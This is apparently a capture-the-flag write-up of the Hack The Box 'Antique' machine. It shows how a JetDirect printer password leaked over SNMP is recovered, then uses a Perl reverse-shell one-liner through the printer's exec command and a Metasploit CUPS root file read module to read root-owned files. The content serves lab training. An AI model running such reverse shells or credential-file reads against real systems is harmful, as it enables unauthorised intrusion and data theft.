neoh main ~/HTB/antique sudo nmap -sSCV -p- -T4 10.10.11.107 -oN nmap.md
[sudo] password for neoh:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 13:19 EST
Nmap scan report for 10.10.11.107
Host is up (0.027s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.54 seconds
Nmap reveals a single open port, 23/tcp, whose banner reads HP JetDirect: the telnet management interface of a network printer. Let’s try it!
neoh main ~/HTB/antique telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password:
Invalid password
Connection closed by foreign host.
neoh main ~/HTB/antique telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: admin
Invalid password
Connection closed by foreign host.
I’m going to need to find the password for this… After a while I found a blog post showing how to exploit it, titled “Getting a JetDirect password remotely using the SNMP vulnerability”. I’ll use snmpwalk.
neoh main ~/HTB/antique snmpwalk -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
I can then convert the hex with xxd and log in to the printer.
neoh main ~/HTB/antique echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
> 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | xxd -r -p
P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5
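The junk after the password above comes from feeding the whole snmpwalk value through xxd: net-snmp prints a BITS object as the raw octets in hex followed by the list of set bit positions, and those decimal positions were decoded as hex too. As an added example (not from the original post), this small Python parser decodes only the octets and uses the trailing bit-position list to find exactly where the octets end; the input line is the snmpwalk output copied from above.

```python
"""Decode the octets of a net-snmp `BITS:` value (bit 0 = MSB of octet 0)."""
import re

# snmpwalk output copied from the scan above (constructed test input).
SNMP_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 "
    "33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 "
    "42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 "
    "111 114 115 119 122 123 126 130 131 134 135"
)


def set_bits(octets: bytes) -> list:
    """Bit positions net-snmp lists for these octets, MSB of octet 0 first."""
    return [i * 8 + b for i, byte in enumerate(octets)
            for b in range(8) if byte & (0x80 >> b)]


def split_bits_value(line: str) -> tuple:
    """Separate the hex octets from the bit-position list.

    Both halves are space-separated tokens that can look like two-digit hex,
    so the boundary is ambiguous by inspection. We take the split at which the
    bit positions recomputed from the octets equal the remaining tokens.
    """
    m = re.search(r"=\s*BITS:\s*(.*)$", line)
    if not m:
        raise ValueError("not a BITS value")
    tokens = m.group(1).split()
    for k in range(1, len(tokens) + 1):
        head = tokens[:k]
        if not all(re.fullmatch(r"[0-9A-Fa-f]{2}", t) for t in head):
            break  # a token that cannot be an octet: no later split can work
        octets = bytes.fromhex("".join(head))
        tail = [int(t) for t in tokens[k:]]
        if set_bits(octets) == tail:
            return octets, tail
    raise ValueError("no consistent octet/bit-list split found")


def decode_password(line: str) -> str:
    """Return the credential the printer leaks over SNMP as printable text."""
    octets, _ = split_bits_value(line)
    return octets.decode("ascii")


if __name__ == "__main__":
    print(decode_password(SNMP_LINE))  # P@ssw0rd@123!!123
```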
neoh main ~/HTB/antique telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
>
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
The ? help output lists an exec parameter at the bottom that runs system commands. I’ll use it to launch a reverse shell. First I start a listener.
neoh main ~ nc -nlvp 4444
Listening on 0.0.0.0 4444
> exec perl -e 'use Socket;$i="10.10.14.13";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
neoh main ~ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.107 53234
sh: 0: can't access tty; job control turned off
$ whoami
lp
$
Looking at the local listening ports, I found something bound only to localhost on port 631.
lp@antique:/etc$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 820/python3
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
udp 0 0 0.0.0.0:161 0.0.0.0:* -
I tried netcat and got no response, but curl showed it was a web server: the CUPS printing system.
lp@antique:/etc$ nc localhost 631
nc localhost 631
lp@antique:/etc$
lp@antique:/etc$ curl -is -X GET localhost:631
curl -is -X GET localhost:631
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 19:01:31 GMT
Server: CUPS/1.6
Connection: Keep-Alive
Keep-Alive: timeout=30
Content-Language: en_US
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 13 May 2021 05:36:41 GMT
Content-Length: 3792
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Home - CUPS 1.6.1</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/"> Home </A></TD>
<TD CLASS="unsel"><A HREF="/admin"> Administration </A></TD>
<TD CLASS="unsel"><A HREF="/classes/"> Classes </A></TD>
<TD CLASS="unsel"><A HREF="/help/"> Online Help </A></TD>
<TD CLASS="unsel"><A HREF="/jobs/"> Jobs </A></TD>
<TD CLASS="unsel"><A HREF="/printers/"> Printers </A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE>
<TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;">
<H1>CUPS 1.6.1</H1>
<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>®</SUP> X and
other UNIX<SUP>®</SUP>-like operating systems.</P>
</TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE>
<TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;">
<H2>CUPS for Users</H2>
<P><A HREF="help/overview.html">Overview of CUPS</A></P>
<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>
<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>
</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">
<H2>CUPS for Administrators</H2>
<P><A HREF="admin">Adding Printers and Classes</A></P>
<P><A HREF="help/policies.html">Managing Operation Policies</A></P>
<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>
<P><A HREF="help/security.html">Server Security</A></P>
<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>
<P><A HREF="help/network.html">Using Network Printers</A></P>
<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>
<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>
</TD><TD VALIGN="top" STYLE="padding-left: 20px;">
<H2>CUPS for Developers</H2>
<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>
<P><A HREF="help/api-cups.html">CUPS API</A></P>
<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>
<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>
<P><A HREF="help/api-ppd.html">PPD API</A></P>
<P><A HREF="help/api-raster.html">Raster API</A></P>
<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>
</TD></TR>
</TABLE>
</TD></TR>
<TR><TD> </TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>
CUPS 1.6.1 is an old version with known vulnerabilities. I start Metasploit and catch a reverse shell there, so I can run a post module against the session.
neoh main ~/HTB/antique msfconsole
=[ metasploit v6.1.12-dev-25b41c9174 ]
+ -- --=[ 2174 exploits - 1152 auxiliary - 398 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.13:4445
[*] Command shell session 1 opened (10.10.14.13:4445 -> 10.10.11.107:60800 ) at 2021-11-14 14:27:43 -0500
whoami
lp
background
Background session 1? [y/N] y
msf6 exploit(multi/handler) > search cups
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/escalate/cups_root_file_read 2012-11-20 normal No CUPS 1.6.1 Root File Read
1 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/cups_bash_env_exec
msf6 exploit(multi/handler) > use 0
msf6 post(multi/escalate/cups_root_file_read) > options
Module options (post/multi/escalate/cups_root_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
ERROR_LOG /var/log/cups/error_log yes The original path to the CUPS error log
FILE /etc/shadow yes The file to steal.
SESSION yes The session to run this module on
msf6 post(multi/escalate/cups_root_file_read) > set SESSION 1
SESSION => 1
msf6 post(multi/escalate/cups_root_file_read) > set FILE /root/root.txt
FiLE => /root/root.txt
msf6 post(multi/escalate/cups_root_file_read) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session type: shell
[!] * incompatible session platform: bsd
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /home/neoh/.msf4/loot/20211114143439_default_10.10.11.107_cups_file_read_516638.txt
[*] Cleaning up...
[*] Post module execution completed
msf6 post(multi/escalate/cups_root_file_read) >
So the exploit worked and I can read the root.txt file!